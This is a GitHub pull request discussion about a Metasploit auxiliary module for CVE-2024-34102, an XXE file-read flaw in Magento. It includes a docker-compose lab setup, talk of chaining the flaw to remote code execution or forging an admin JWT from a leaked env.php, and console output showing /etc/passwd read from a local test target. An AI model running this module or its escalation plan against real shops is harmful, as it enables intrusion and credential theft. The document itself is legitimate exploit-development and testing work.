metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard
verified publisher icon rapid7

WIP - added module for CVE-2024-34102

Open heyder opened this issue 1 year ago • 2 comments

Placeholder for the module for the CVE-2024-34102.

Vulnerable Application

docker-compose.yml

version: '2'
services:
  mariadb:
    image: docker.io/bitnami/mariadb:10.6
    environment:
      # ALLOW_EMPTY_PASSWORD is recommended only for development.
      - ALLOW_EMPTY_PASSWORD=yes
      - MARIADB_USER=bn_magento
      - MARIADB_DATABASE=bitnami_magento
    volumes:
      - 'mariadb_data:/bitnami/mariadb'
  magento:
    image: docker.io/bitnami/magento:2
    ports:
      - '80:8080'
      - '443:8443'
    environment:
      - MAGENTO_HOST=localhost
      - MAGENTO_DATABASE_HOST=mariadb
      - MAGENTO_DATABASE_PORT_NUMBER=3306
      - MAGENTO_DATABASE_USER=bn_magento
      - MAGENTO_DATABASE_NAME=bitnami_magento
      - ELASTICSEARCH_HOST=elasticsearch
      - ELASTICSEARCH_PORT_NUMBER=9200
      # ALLOW_EMPTY_PASSWORD is recommended only for development.
      - ALLOW_EMPTY_PASSWORD=yes
    volumes:
      - 'magento_data:/bitnami/magento'
    depends_on:
      - mariadb
      - elasticsearch
  elasticsearch:
    image: docker.io/bitnami/elasticsearch:7
    volumes:
      - 'elasticsearch_data:/bitnami/elasticsearch/data'
volumes:
  mariadb_data:
    driver: local
  magento_data:
    driver: local
  elasticsearch_data:
    driver: local

Software versions

root@6cedd6f9eae9:~# php /bitnami/magento/bin/magento --version
Magento CLI 2.4.7
root@6cedd6f9eae9:~# 

root@6cedd6f9eae9:~# /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Debian GLIBC 2.36-9+deb12u7) stable release version 2.36.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 12.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.
root@6cedd6f9eae9:~#

heyder avatar Jul 04 '24 14:07 heyder

Hey @heyder! Thanks for showing interest in this module! Apologies for the overlap - I also have working module to exploit CVE-2024-34102 (I was tracking it with this issue https://github.com/rapid7/metasploit-framework/issues/19290).

I was just beginning to look into how we might be able to chain it with CVE-2024-2961 in order to obtain RCE. Were you also thinking of attempting to chain those together? If so, and if you're at all interested maybe we could collaborate as I'll be off working on module development until July 22nd after today - no pressure though.

jheysel-r7 avatar Jul 04 '24 15:07 jheysel-r7

Hey @jheysel-r7! In the last few days, I struggled to get it chained with CVE-2024-2961 by putting some pieces together, but I still haven't made real progress in obtaining RCE. So, yes, if you would like, I would be more than happy to get help and invest more time in this direction.

However, if we don't progress, we still have plan B: leaking the env.php file and giving the module's user admin rights in the application by signing a JWT.

heyder avatar Jul 05 '24 10:07 heyder

Hey @jheysel-r7! In the last few days, I struggled to get it chained with CVE-2024-2961 by putting some pieces together, but I still haven't made real progress in obtaining RCE. So, yes, if you would like, I would be more than happy to get help and invest more time in this direction.

However, if we don't progress, we still have plan B: leaking the env.php file and giving the module's user admin rights in the application by signing a JWT.

Sounds like a great plan. It's probably best if we just continue with this module as is. In the event I can get RCE working and the exploit for CVE-2024-2961 is as robust as the blog post says it is, it might make sense to write a mixin for CVE-2024-2961 where you can override the functions send and download for the specific exploit.

I'll let you know how it goes and if I get it working I'd be happy to do the necessary refactoring.

jheysel-r7 avatar Jul 07 '24 19:07 jheysel-r7

@jheysel-r7 I haven't had time to look into that last week, so I think it's worth moving forward with this module in its simplest version. I'll come back to it and do the refactoring in the near future.

heyder avatar Jul 16 '24 12:07 heyder

When SRVHOST isn't correctly defined.

msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Magento Community edition version 2.4 which is vulnerable
[-] Auxiliary aborted due to failure: bad-config: SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful
[*] Auxiliary module execution completed

When TARGETFILE doesn't exist

msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > set TARGETFILE /etc/nonexist
TARGETFILE => /etc/nonexist
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Magento Community edition version 2.4 which is vulnerable
[*] Using URL: http://192.168.128.1:8080/
[-] Auxiliary aborted due to failure: unexpected-reply: Server returned unexpected response: 500
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) >

When everything is properly configured.

msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > set TARGETFILE /etc/passwd
TARGETFILE => /etc/passwd
msf6 auxiliary(gather/magento_xxe_cve_2024_34102) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Magento Community edition version 2.4 which is vulnerable
[*] Using URL: http://192.168.128.1:8080/
[+] File read succeeded! 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

[*] Server stopped.
[*] Auxiliary module execution completed

heyder avatar Jul 18 '24 08:07 heyder

Release Notes

This adds an auxiliary module for an XXE which results in an arbitrary file in Magento which is being tracked as CVE-2024-34102.

jheysel-r7 avatar Jul 18 '24 17:07 jheysel-r7